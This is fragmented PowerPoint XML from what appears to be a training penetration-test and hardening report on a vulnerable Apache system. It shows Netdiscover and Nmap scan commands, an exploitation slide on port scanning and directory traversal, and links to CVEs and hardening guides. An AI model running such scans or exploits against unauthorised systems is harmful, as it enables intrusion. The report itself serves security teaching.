            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="104775" y="750888"/>
            <a:ext cx="6678613" cy="37576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8798eb4c44_0_44:notes"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="688817" y="4758889"/>
            <a:ext cx="5510530" cy="4508421"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="96591" tIns="96591" rIns="96591" bIns="96591" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="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8798eb4c44_0_44:notes"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="104775" y="750888"/>
            <a:ext cx="6678613" cy="37576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8798eb4c44_0_44:notes"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="688817" y="4758889"/>
            <a:ext cx="5510530" cy="4508421"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="96591" tIns="96591" rIns="96591" bIns="96591" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="40100081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8798eb4c44_0_44:notes"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="104775" y="750888"/>
            <a:ext cx="6678613" cy="37576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8798eb4c44_0_44:notes"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="688817" y="4758889"/>
            <a:ext cx="5510530" cy="4508421"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="96591" tIns="96591" rIns="96591" bIns="96591" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="11313969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7" name="Google Shape;447;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48" name="Google Shape;448;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0" name="Google Shape;450;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1" name="Google Shape;451;p26"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12300" y="1602450"/>
            <a:ext cx="4298400" cy="33018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2" name="Google Shape;452;p26"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4936274" y="890150"/>
            <a:ext cx="2688300" cy="4767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6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457246" y="887925"/>
            <a:ext cx="2688300" cy="4767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6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4466800" y="1604700"/>
            <a:ext cx="4298400" cy="33018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57"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="458" name="Google Shape;458;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9" name="Google Shape;459;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0" name="Google Shape;460;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1" name="Google Shape;461;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63" name="Google Shape;463;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4" name="Google Shape;464;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0" name="Google Shape;480;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1" name="Google Shape;481;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 name="Google Shape;482;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3" name="Google Shape;483;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8" name="Google Shape;488;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9" name="Google Shape;489;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1" name="Google Shape;491;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2" name="Google Shape;492;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3" name="Google Shape;493;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7" name="Google Shape;497;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8" name="Google Shape;498;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99" name="Google Shape;499;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6" name="Google Shape;506;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7" name="Google Shape;507;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8" name="Google Shape;508;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0" name="Google Shape;510;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1" name="Google Shape;511;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 name="Google Shape;512;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6" name="Google Shape;516;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7" name="Google Shape;517;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18" name="Google Shape;518;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5" name="Google Shape;525;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6" name="Google Shape;526;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7" name="Google Shape;527;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9" name="Google Shape;529;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0" name="Google Shape;530;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1" name="Google Shape;531;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5" name="Google Shape;535;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6" name="Google Shape;536;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37" name="Google Shape;537;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4" name="Google Shape;544;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45" name="Google Shape;545;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46" name="Google Shape;546;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48" name="Google Shape;548;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9" name="Google Shape;549;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0" name="Google Shape;550;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4" name="Google Shape;554;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5" name="Google Shape;555;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56" name="Google Shape;556;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3" name="Google Shape;563;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64" name="Google Shape;564;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65" name="Google Shape;565;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67" name="Google Shape;567;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8" name="Google Shape;568;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9" name="Google Shape;569;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3" name="Google Shape;573;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77" name="Google Shape;577;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5" name="Google Shape;585;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86" name="Google Shape;586;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87" name="Google Shape;587;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89" name="Google Shape;589;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0" name="Google Shape;590;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1" name="Google Shape;591;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5" name="Google Shape;595;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6" name="Google Shape;596;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99" name="Google Shape;599;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7" name="Google Shape;607;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8" name="Google Shape;608;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09" name="Google Shape;609;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1" name="Google Shape;611;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2" name="Google Shape;612;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3" name="Google Shape;613;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7" name="Google Shape;617;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8" name="Google Shape;618;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1" name="Google Shape;621;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9" name="Google Shape;629;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0" name="Google Shape;630;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1" name="Google Shape;631;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3" name="Google Shape;633;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4" name="Google Shape;634;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5" name="Google Shape;635;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3" name="Google Shape;643;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1" name="Google Shape;651;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2" name="Google Shape;652;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53" name="Google Shape;653;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5" name="Google Shape;655;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6" name="Google Shape;656;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7" name="Google Shape;657;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5" name="Google Shape;665;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6" name="Google Shape;666;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7" name="Google Shape;667;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6" name="Google Shape;676;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7" name="Google Shape;677;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78" name="Google Shape;678;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0" name="Google Shape;680;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0" name="Google Shape;690;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1" name="Google Shape;691;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2" name="Google Shape;692;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2" name="Google Shape;702;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03" name="Google Shape;703;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05" name="Google Shape;705;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6" name="Google Shape;706;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7" name="Google Shape;707;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5" name="Google Shape;715;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6" name="Google Shape;716;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17" name="Google Shape;717;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27" name="Google Shape;727;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28" name="Google Shape;728;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0" name="Google Shape;730;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1" name="Google Shape;731;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2" name="Google Shape;732;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0" name="Google Shape;740;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1" name="Google Shape;741;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2" name="Google Shape;742;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1" name="Google Shape;751;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2" name="Google Shape;752;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3" name="Google Shape;753;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55" name="Google Shape;755;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6" name="Google Shape;756;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7" name="Google Shape;757;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9" name="Google Shape;759;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1" name="Google Shape;761;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7" name="Google Shape;767;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69" name="Google Shape;769;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9" name="Google Shape;77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0" name="Google Shape;78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1" name="Google Shape;781;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3" name="Google Shape;783;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4" name="Google Shape;784;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5" name="Google Shape;785;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7" name="Google Shape;787;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9" name="Google Shape;789;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3" name="Google Shape;793;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5" name="Google Shape;795;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7" name="Google Shape;797;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7" name="Google Shape;807;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08" name="Google Shape;808;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09" name="Google Shape;809;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1" name="Google Shape;811;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2" name="Google Shape;812;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3" name="Google Shape;813;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5" name="Google Shape;815;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7" name="Google Shape;817;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1" name="Google Shape;821;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3" name="Google Shape;823;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5" name="Google Shape;825;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5" name="Google Shape;835;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6" name="Google Shape;836;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37" name="Google Shape;837;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9" name="Google Shape;839;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0" name="Google Shape;840;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1" name="Google Shape;841;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5" name="Google Shape;845;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3" name="Google Shape;853;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0"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="861" name="Google Shape;861;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2" name="Google Shape;862;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3" name="Google Shape;863;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64" name="Google Shape;864;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6" name="Google Shape;866;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1" name="Google Shape;871;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3" name="Google Shape;873;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5" name="Google Shape;875;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7" name="Google Shape;877;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9" name="Google Shape;879;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1" name="Google Shape;881;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3" name="Google Shape;883;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1"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="892" name="Google Shape;892;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3" name="Google Shape;893;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94" name="Google Shape;894;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95" name="Google Shape;895;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7" name="Google Shape;897;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8" name="Google Shape;898;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2" name="Google Shape;902;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4" name="Google Shape;904;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6" name="Google Shape;906;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8" name="Google Shape;908;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0" name="Google Shape;910;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2" name="Google Shape;912;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14" name="Google Shape;914;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2"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="923" name="Google Shape;923;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25" name="Google Shape;925;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26" name="Google Shape;926;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28" name="Google Shape;928;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9" name="Google Shape;929;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3" name="Google Shape;933;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5" name="Google Shape;935;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7" name="Google Shape;937;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9" name="Google Shape;939;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1" name="Google Shape;941;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3" name="Google Shape;943;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45" name="Google Shape;945;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53"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="954" name="Google Shape;954;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5" name="Google Shape;955;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56" name="Google Shape;956;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57" name="Google Shape;957;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59" name="Google Shape;959;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0" name="Google Shape;960;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4" name="Google Shape;964;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6" name="Google Shape;966;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8" name="Google Shape;968;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0" name="Google Shape;970;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2" name="Google Shape;972;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4" name="Google Shape;974;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76" name="Google Shape;976;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86" name="Google Shape;986;p48"/>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7" name="Google Shape;987;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88" name="Google Shape;988;p4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94" name="Google Shape;994;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5" name="Google Shape;995;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6" name="Google Shape;996;p49"/>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998"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="999" name="Google Shape;999;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01"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1002" name="Google Shape;1002;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1011"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1012" name="Google Shape;1012;p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5817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hyperlink" Target="http://crackstation.net/"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54.png"/><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42.png"/><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8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cloudwards.net/what-is-webdav/" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/List_of_Apache_modules" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://stackoverflow.com/questions/5689423/how-to-ban-all-executable-files-on-apache" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.simplified.guide/apache/disable-directory-listing" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.imunify360.com/top-10-hosting-security-best-practices" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.elastic.co/guide/en/security/current/detection-engine-overview.html" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.securityinnovation.com/blog/2014/01/preventing-shell-upload-vulnerabilities-in-php.html" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://unix.stackexchange.com/questions/345114/how-to-protect-against-port-scanners" TargetMode="External"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://media.defense.gov/2020/Jun/09/2002313081/-1/-1/0/CSI-DETECT-AND-PREVENT-WEB-SHELL-MALWARE-20200422.PDF" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://geekflare.com/apache-web-server-hardening-security/" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout7.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cyber.gov.au/acsc/view-all-content/publications/essential-eight-maturity-model" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.howtogeek.com/devops/how-to-configure-mod_evasive-for-apache-ddos-protection/" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.elastic.co/guide/en/security/current/rules-ui-management.html#load-prebuilt-rules" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/jzdziarski/mod_evasive" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://httpd.apache.org/docs/2.4/misc/security_tips.html" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cvedetails.com/version-list/45/66/1/Apache-Http-Server.html" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs.html" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.wp-bridge.com/the-14-step-apache-security-best-practices-checklist/" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwiki.apache.org/confluence/display/httpd/CommonHTTPStatusCodes"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cwe.mitre.org/data/definitions/553.html"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hyperlink" Target="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41773" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0211"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cvedetails.com/cwe-details/799/Improper-Control-of-Interaction-Frequency.html"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hyperlink" Target="https://cwe.mitre.org/data/definitions/256.html" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/312.html" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cvedetails.com/cwe-details/548/Information-Leak-Through-Directory-Listing.html"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cwe.mitre.org/data/definitions/328.html"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s://cwe.mitre.org/data/definitions/308.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54"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="274350" y="170392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Capstone Engagement</a:t>
            </a:r>
            <a:endParaRPr sz="3100" dirty="0">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3100" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Assessment, Analysis, </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="3100" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="3100" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>and Hardening of a Vulnerable System</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="3100" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="2000" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Report: Leon Scott</a:t>
            </a:r>
            <a:endParaRPr sz="3100" dirty="0">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1019" name="Google Shape;1019;p5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Exploitation: [Portscan &amp; Directory Transversal]</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1090" name="Google Shape;1090;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91" name="Google Shape;1091;p61"/>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1"/>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00" b="1" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Tools &amp; Processes</a:t>
            </a:r>
            <a:endParaRPr sz="1000" b="1"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lang="en" sz="1000"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000" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Commence with an authorised network discovery and scan</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en" sz="1000"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000" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>The following commands were used:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en" sz="1000" dirty="0">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="1000" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>N</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>etdiscover –r 192.168.1.255/16</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="1000" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>N</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>map –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1000" dirty="0" err="1">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Sv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t> 192.168.1.0/24</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" lvl="0" indent="-171450" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en" sz="1000" dirty="0">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1093" name="Google Shape;1093;p61"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457181" y="887903"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1094" name="Google Shape;1094;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095" name="Google Shape;1095;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61"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3228956" y="887903"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1097" name="Google Shape;1097;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098" name="Google Shape;1098;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9" name="Google Shape;1099;p61"/>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1"/>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00" b="1" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Achievements</a:t>
            </a:r>
            <a:endParaRPr sz="1000" b="1"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lang="en" sz="1000"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000" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Netdiscover: found 3 hosts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en" sz="1000"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AU" sz="1000" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>N</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>map scan:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en" sz="1000"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000" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
